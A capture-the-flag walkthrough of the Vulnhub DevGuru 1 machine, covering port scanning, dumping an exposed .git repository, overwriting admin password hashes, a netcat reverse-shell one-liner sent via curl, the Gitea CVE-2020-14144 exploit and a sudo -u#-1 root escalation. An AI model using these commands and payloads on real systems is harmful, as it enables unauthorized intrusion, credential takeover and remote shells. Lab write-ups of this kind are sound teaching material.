Vulnhub - DevGuru 1

Recon

NMAP Complete Scan

# Nmap 7.92 scan initiated Sat Jan 22 19:16:13 2022 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /root/vulnHub/DevGuru/192.168.236.6/scans/_full_tcp_nmap.txt -oX /root/vulnHub/DevGuru/192.168.236.6/scans/xml/_full_tcp_nmap.xml 192.168.236.6
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #fcfcfc; color: #333333; margin: 0; padding:0; \}\nh1 \{ font-size: 1\.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; \}\nh1, p \{ padding-left: 10px; \}\ncode\.url \{ background-color: #eeeeee; font-family:monospace; padding:0 2px;\}\n</style>'
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.0 404 Not Found\r\n(?:[^<]+|<(?!/head>))*?<style>\nbody \{ background-color: #ffffff; color: #000000; \}\nh1 \{ font-family: sans-serif; font-size: 150%; background-color: #9999cc; font-weight: bold; color: #000000; margin-top: 0;\}\n</style>'
adjust_timeouts2: packet supposedly had rtt of -126797 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -126797 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -351260 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -351260 microseconds.  Ignoring time.
Nmap scan report for 192.168.236.6
Host is up, received arp-response (0.00034s latency).
Scanned at 2022-01-22 19:16:14 +08 for 265s
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2a:46:e8:2b:01:ff:57:58:7a:5f:25:a4:d6:f2:89:8e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC+lft/kQdC+3L4qMerPmpboe5GOrB60x+QU0R7hjmxY+9bNqST//1+Oa7ycVotqdlk4EtxgnqE2B4mRTNb16mITv/Y8UfsCqYAuy3C8lV9HzG6zgsXgnAhvpMmY31fZqz+dKamnp1W1o+scbnzRNqr/fE1+Yz7Fcu4JvAJ/4NLQS9CHmZh+N12OyF8eVOQmjPeRVHR8BiptinM+EXis4xpOQiuZoEBPkyqhXcBW65CAXlkjuuJ6KpJ7Y3Gbse38L6LKGFs8Hl5k1jbuTxDg8CT+rzzy6on8niDDfcVwHTvZ1JqlUpzjaGifDD8gV60ebRa5/36ORI+ed6G9v1HOW3r
|   256 08:79:93:9c:e3:b4:a4:be:80:ad:61:9d:d3:88:d2:84 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQzBnXE0Ezf7XOzh2KxdMAetOtoTEmfiCh2OSwjnIpAzd1osDr7UsuNt/5m45OgfWVAcVnu3ECEuQZ03P4VxkU=
|   256 9c:f9:88:d4:33:77:06:4e:d9:7c:39:17:3e:07:9c:bd (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINjsvy3HYYZxlENx0Fmval1Ax8ApGBKu6wf5sjK8xuv2
80/tcp   open  http    syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Corp - DevGuru
| http-git: 
|   192.168.236.6:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: first commit 
|     Remotes:
|       http://devguru.local:8585/frank/devguru-website.git
|_    Project type: PHP application (guessed from .gitignore)
|_http-generator: DevGuru
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
8585/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   GenericLines: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=2f428c4ac55f1c18; Path=/; HttpOnly
|     Set-Cookie: _csrf=lENihkNa2WujFFhlk1uKO9MzSk46MTY0Mjg3ODk4MzAyMDk1OTkzNw; Path=/; Expires=Sun, 23 Jan 2022 19:16:23 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 22 Jan 2022 19:16:23 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|     <meta name="description" content="Gitea (Git with a cup of tea) is a painless
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=785c9c97bebd9516; Path=/; HttpOnly
|     Set-Cookie: _csrf=yO5GDioNp2YyN3W237omCxqKCK86MTY0Mjg3ODk4MzA0MzgwNDc3MA; Path=/; Expires=Sun, 23 Jan 2022 19:16:23 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sat, 22 Jan 2022 19:16:23 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Gitea: Git with a cup of tea </title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <meta name="theme-color" content="#6cc644">
|     <meta name="author" content="Gitea - Git with a cup of tea" />
|_    <meta name="description" content="Gitea (Git with a c
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8585-TCP:V=7.92%I=9%D=1/22%Time=61EBE788%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,2A00,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20Path=/;
SF:\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=2f428c4ac55f1c18;
SF:\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=lENihkNa2WujFFhlk1uKO9M
SF:zSk46MTY0Mjg3ODk4MzAyMDk1OTkzNw;\x20Path=/;\x20Expires=Sun,\x2023\x20Ja
SF:n\x202022\x2019:16:23\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x20SAMEOR
SF:IGIN\r\nDate:\x20Sat,\x2022\x20Jan\x202022\x2019:16:23\x20GMT\r\n\r\n<!
SF:DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\">\n<head\x
SF:20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20name=\"v
SF:iewport\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\t<me
SF:ta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t<title>
SF:\x20Gitea:\x20Git\x20with\x20a\x20cup\x20of\x20tea\x20</title>\n\t<link
SF:\x20rel=\"manifest\"\x20href=\"/manifest\.json\"\x20crossorigin=\"use-c
SF:redentials\">\n\t<meta\x20name=\"theme-color\"\x20content=\"#6cc644\">\
SF:n\t<meta\x20name=\"author\"\x20content=\"Gitea\x20-\x20Git\x20with\x20a
SF:\x20cup\x20of\x20tea\"\x20/>\n\t<meta\x20name=\"description\"\x20conten
SF:t=\"Gitea\x20\(Git\x20with\x20a\x20cup\x20of\x20tea\)\x20is\x20a\x20pai
SF:nless")%r(HTTPOptions,212A,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent
SF:-Type:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20lang=en-US;\x20
SF:Path=/;\x20Max-Age=2147483647\r\nSet-Cookie:\x20i_like_gitea=785c9c97be
SF:bd9516;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=yO5GDioNp2YyN3W2
SF:37omCxqKCK86MTY0Mjg3ODk4MzA0MzgwNDc3MA;\x20Path=/;\x20Expires=Sun,\x202
SF:3\x20Jan\x202022\x2019:16:23\x20GMT;\x20HttpOnly\r\nX-Frame-Options:\x2
SF:0SAMEORIGIN\r\nDate:\x20Sat,\x2022\x20Jan\x202022\x2019:16:23\x20GMT\r\
SF:n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20class=\"theme-\">\n
SF:<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-8\">\n\t<meta\x20n
SF:ame=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1\">
SF:\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\t
SF:<title>Page\x20Not\x20Found\x20-\x20\x20Gitea:\x20Git\x20with\x20a\x20c
SF:up\x20of\x20tea\x20</title>\n\t<link\x20rel=\"manifest\"\x20href=\"/man
SF:ifest\.json\"\x20crossorigin=\"use-credentials\">\n\t<meta\x20name=\"th
SF:eme-color\"\x20content=\"#6cc644\">\n\t<meta\x20name=\"author\"\x20cont
SF:ent=\"Gitea\x20-\x20Git\x20with\x20a\x20cup\x20of\x20tea\"\x20/>\n\t<me
SF:ta\x20name=\"description\"\x20content=\"Gitea\x20\(Git\x20with\x20a\x20
SF:c");
MAC Address: 08:00:27:B9:F2:2E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/22%OT=22%CT=1%CU=40527%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=61EBE887%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Uptime guess: 26.965 days (since Sun Dec 26 20:10:20 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.236.6

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 22 19:20:39 2022 -- 1 IP address (1 host up) scanned in 266.55 seconds

TCP/80 (HTTP)

FFUF

┌──(root💀kali)-[~/vulnHub/DevGuru/192.168.236.6]
└─# ffuf -u http://192.168.236.6/FUZZ -w /usr/share/wordlists/dirb/common.txt -e ".html,.php,.txt" -fw 1,2,20

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.236.6/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .php .txt 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 1,2,20
________________________________________________

.htaccess               [Status: 200, Size: 1678, Words: 282, Lines: 53]
                        [Status: 200, Size: 12669, Words: 929, Lines: 331]
0                       [Status: 200, Size: 12669, Words: 929, Lines: 331]
about                   [Status: 200, Size: 18661, Words: 977, Lines: 478]
backend                 [Status: 302, Size: 410, Words: 60, Lines: 12]
index.php               [Status: 200, Size: 12719, Words: 929, Lines: 331]
Services                [Status: 200, Size: 10032, Words: 815, Lines: 267]
:: Progress: [18460/18460] :: Job [1/1] :: 42 req/sec :: Duration: [0:06:45] :: Errors: 6 ::

• backend
• htaccess

  Nikto

  ``` ┌──(root💀kali)-[~/vulnHub/DevGuru] └─# nikto -ask=no -h http://192.168.236.6:80 2>&1 | tee “/root/vulnHub/DevGuru/192.168.236.6/scans/tcp80/tcp_80_http_nikto.txt”

• Nikto v2.1.6

• Target IP: 192.168.236.6
• Target Hostname: 192.168.236.6
• Target Port: 80

• Start Time: 2022-01-22 20:39:22 (GMT8)

• Server: Apache/2.4.29 (Ubuntu)
• The anti-clickjacking X-Frame-Options header is not present.
• The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
• The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
• No CGI Directories found (use ‘-C all’ to force check all possible dirs)
• Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
• OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
• OSVDB-3233: /icons/README: Apache default file found.
• OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
• /.git/HEAD: Git HEAD file found. Full repo details may be present.
• /.git/config: Git config file found. Infos about repo details may be present.
• X-XSS-Protection header has been set to disable XSS Protection. There is unlikely to be a good reason for this.
• /.gitignore: .gitignore file found. It is possible to grasp the directory structure.
• 7915 requests: 0 error(s) and 11 item(s) reported on remote host

• End Time: 2022-01-22 20:45:54 (GMT8) (392 seconds)

• 1 host(s) tested ```
• Git Repository Found:
  • .git
  • .git/index
  • .git/HEAD
  • .git/config
  • .gitignore

TCP/8585 (HTTP)

FFUF

┌──(root💀kali)-[~/vulnHub/DevGuru]
└─# ffuf -u http://192.168.236.6:8585/FUZZ -w /usr/share/wordlists/dirb/common.txt -e ".html,.txt,.php" -fw 2

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.236.6:8585/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php 
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 2
________________________________________________

                        [Status: 200, Size: 10383, Words: 807, Lines: 296]
debug                   [Status: 200, Size: 160, Words: 18, Lines: 5]
:: Progress: [18460/18460] :: Job [1/1] :: 741 req/sec :: Duration: [0:00:28] :: Errors: 0 ::

Initial Foothold

TCP/8585 - Gitea

1. Proceed to debug
2. Both directories returned 404.
   • Gitea: 1.12.5
3. Proceed to http://192.168.236.6:8585/explore/users
   • frank
4. Found an exploit that requires authentication

    ┌──(root💀kali)-[~/tools/GitTools/Extractor]
    └─# searchsploit gitea 1.12.5
    ------------------------------------------------------------------------------------
    Exploit Title           						     | Path
    ------------------------------------------------------------------------------------
    Gitea 1.12.5 - Remote Code Execution (Authenticated) | multiple/webapps/49571.py
    ------------------------------------------------------------------------------------
   

5. Unable to use exploit, no valid credentials

TCP/80 - October CMS (RCE)

1. View .htaccess
   • Black Listed: (Not allowed to access)
     • ^bootstrap/.* index.php: Redirects to index.php
     • ^: matches the beginning of a string
     • L,NC:
       • L: process the rule immediately when match
       • NC: no case
   • White Listed:
     • /adminer.php
2. View enumerated directories
   • backend
   • adminer.php
     • No exploits found for adminer 4.7.7
3. Extract all contents from .git w/ gitdumper.sh

    ┌──(root💀kali)-[~/tools/GitTools/Dumper]
    └─# ./gitdumper.sh http://192.168.236.6/.git/ /root/vulnHub/DevGuru/192.168.236.6/loot/http/devguru
    [+] Creating /root/vulnHub/DevGuru/192.168.236.6/loot/http/devguru/.git/
    [+] Downloaded: HEAD
    [-] Downloaded: objects/info/packs
    [+] Downloaded: description
    [+] Downloaded: config
    [+] Downloaded: COMMIT_EDITMSG
    [+] Downloaded: index
    [-] Downloaded: packed-refs
    [+] Downloaded: refs/heads/master
    [-] Downloaded: refs/remotes/origin/HEAD
    [-] Downloaded: refs/stash
    [+] Downloaded: logs/HEAD
    ...
   

4. Recover incomplete git repositories w/ extractor.sh

    ┌──(root💀kali)-[~/tools/GitTools/Extractor]
    └─# ./extractor.sh /root/vulnHub/DevGuru/192.168.236.6/loot/http/devguru/ /root/vulnHub/DevGuru/192.168.236.6/loot/http/devguru_dump/
    [+] Found commit: 7de9115700c5656c670b34987c6fbffd39d90cf2
    [+] Found file: /root/vulnHub/DevGuru/192.168.236.6/loot/http/devguru_dump//0-7de9115700c5656c670b34987c6fbffd39d90cf2/.gitignore
    [+] Found file: /root/vulnHub/DevGuru/192.168.236.6/loot/http/devguru_dump//0-7de9115700c5656c670b34987c6fbffd39d90cf2/.htaccess
    [+] Found file: /root/vulnHub/DevGuru/192.168.236.6/loot/http/devguru_dump//0-7de9115700c5656c670b34987c6fbffd39d90cf2/README.md
    [+] Found file: /root/vulnHub/DevGuru/192.168.236.6/loot/http/devguru_dump//0-7de9115700c5656c670b34987c6fbffd39d90cf2/adminer.php
    ...
   

5. View config/database.php
   • october:SQ66EBYx4GT3byXH
6. Login to Adminer
7. View backend_users
8. Generate hash

    ┌──(root💀kali)-[~/tools/GitTools/Extractor]
    └─# htpasswd -nbBC 10 frank password
    frank:$2y$10$RT6DEmOZIxbj/uv0MLyEWuPUMNSr6s1r7JXzCCOI/kHZCiq/0cN9.
   

9. Replace frank’s hash
10. Login
11. Proceed to CMS -> Home
12. Insert code execution functionality
13. Test RCE
14. Encode payload

    ┌──(root💀kali)-[~/vulnHub/DevGuru/192.168.236.6/exploit]
    └─# hURL --URL "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.236.4 4444>/tmp/f"
    
    Original    :: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.236.4 4444>/tmp/f
    URL ENcoded :: rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.236.4%204444%3E%2Ftmp%2Ff
    

15. Execute reverse shell

    ┌──(root💀kali)-[~/tools/GitTools/Extractor]
    └─# curl http://192.168.236.6/?cmd=rm+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.236.4+4444%3E%2Ftmp%2Ff
    

    

Privilege Escalation

Frank - Via Creds Found in Linux + Gitea (RCE)

1. Ran linpeas, found interesting file
2. View /var/backups/app.ini.bak
   • gitea:UfFPTF8C8jjxVF2m
3. Access mysql w/ gitea:UfFPTF8C8jjxVF2m

    www-data@devguru:/var/www/html$ mysql -u gitea -p
    Enter password: UfFPTF8C8jjxVF2m
    MariaDB [gitea]> SHOW databases;
    MariaDB [gitea]> USE gitea;
    MariaDB [gitea]> SHOW tables;
    MariaDB [gitea]> SELECT * FROM user;
    MariaDB [gitea]> SELECT name,passwd from user;
    frank:c200e0d03d1604cee72c484f154dd82d75c7247b04ea971a96dd1def8682d02488d0323397e26a18fb806c7a20f0b564c900 
    MariaDB [gitea]> SELECT name, login_name, passwd, passwd_hash_algo FROM user;
    +-------+------------+----------+------------------+
    | name  | login_name | passwd   | passwd_hash_algo |
    +-------+------------+----------+------------------+
    | frank |            | c200.... | pbkdf2           |
    +-------+------------+----------+------------------+
   
   

4. Unable to identify hash
5. Generate bcrypt hash
6. Change password

    MariaDB [gitea]> UPDATE user       
        -> SET login_name = 'frank'
        -> WHERE name='frank';
    Query OK, 0 rows affected (0.01 sec)
    Rows matched: 1  Changed: 1  Warnings: 0
   
    MariaDB [gitea]> UPDATE user 
        -> SET passwd_hash_algo = 'bcrypt'
        -> WHERE name='frank';
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1  Changed: 1  Warnings: 0
   
    MariaDB [gitea]> UPDATE user 
        -> SET passwd = '$2a$12$3mVpdsh50M28M0QAQts65uNhSlhJkp3qdx6C97Gd9wUp.2nQ.jI46'
        -> WHERE name='frank';
    Query OK, 1 row affected (0.00 sec)
    Rows matched: 1  Changed: 1  Warnings: 0
   

   

7. Login w/ frank:password
8. Earlier, we found an exploit that requires authentication, run it

    ┌──(root💀kali)-[~/vulnHub/DevGuru/192.168.236.6/exploit/gitea/rce]
    └─#  git config --global user.email "asdf@example.com"
    ┌──(root💀kali)-[~/vulnHub/DevGuru/192.168.236.6/exploit/gitea/rce]
    └─# git config --global user.name "asdf"
    ┌──(root💀kali)-[~/vulnHub/DevGuru/192.168.236.6/exploit/gitea]
    └─# python3 49571.py -t http://$ip:8585 -u frank -p password -I 192.168.236.4 -P 1337 
        _____ _ _______
       / ____(_)__   __|             CVE-2020-14144
      | |  __ _   | | ___  __ _
      | | |_ | |  | |/ _ \/ _` |     Authenticated Remote Code Execution
      | |__| | |  | |  __/ (_| |
       \_____|_|  |_|\___|\__,_|     GiTea versions >= 1.1.0 to <= 1.12.5
   
    [+] Starting exploit ...
    hint: Using 'master' as the name for the initial branch. This default branch name
    hint: is subject to change. To configure the initial branch name to use in all
    hint: of your new repositories, which will suppress this warning, call:
    hint: 
    hint: 	git config --global init.defaultBranch <name>
    hint: 
    hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and
    hint: 'development'. The just-created branch can be renamed via this command:
    hint: 
    hint: 	git branch -m <name>
    Initialized empty Git repository in /tmp/tmp.T8KmuZEi5T/.git/
    [master (root-commit) d9313e2] Initial commit
     1 file changed, 1 insertion(+)
     create mode 100644 README.md
    Enumerating objects: 3, done.
    Counting objects: 100% (3/3), done.
    Writing objects: 100% (3/3), 240 bytes | 240.00 KiB/s, done.
    [+] Exploit completed !
    ┌──(root💀kali)-[~/tools/GitTools/Extractor]
    └─# nc -nvlp 1337
    Ncat: Version 7.92 ( https://nmap.org/ncat )
    Ncat: Listening on :::1337
    Ncat: Listening on 0.0.0.0:1337
    Ncat: Connection from 192.168.236.6.
    Ncat: Connection from 192.168.236.6:44070.
    bash: cannot set terminal process group (755): Inappropriate ioctl for device
    bash: no job control in this shell
    frank@devguru:~/gitea-repositories/frank/vuln.git$ whoami
    whoami
    frank
   

   

9. Manual exploit
   • https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
10. Flag

    frank@devguru:/home/frank$ cat user.txt
    cat user.txt
    22854d0aec6ba776f9d35bf7b0e00217
    frank@devguru:/home/frank$ 
    

Root - Via Sudo Exploit + Sudo GTFO Bin

1. Ran linpeas
2. Find exploit
   • https://www.exploit-db.com/exploits/47502
   • Saw this in TryHackMe: AgentSudo
3. Check for sudo access

    frank@devguru:~/gitea-repositories/frank/vuln.git$ sudo -l
    sudo -l
    Matching Defaults entries for frank on devguru:
        env_reset, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
   
    User frank may run the following commands on devguru:
        (ALL, !root) NOPASSWD: /usr/bin/sqlite3
   

4. Exploit

    frank@devguru:~/gitea-repositories/frank/vuln.git$ sudo -u#-1 /usr/bin/sqlite3 /dev/null '.shell /bin/sh'
    <o -u#-1 /usr/bin/sqlite3 /dev/null '.shell /bin/sh'
    sh: 0: getcwd() failed: No such file or directory
    sh: 0: getcwd() failed: No such file or directory
    whoami
    root
   

   

5. Flag

    root@devguru:/# cd /root
    cd /root
    root@devguru:/root# ls  
    ls
    msg.txt  root.txt
    root@devguru:/root# cat *
           Congrats on rooting DevGuru!
      Contact me via Twitter @zayotic to give feedback!
   
   
    96440606fb88aa7497cde5a8e68daf8f
    root@devguru:/root#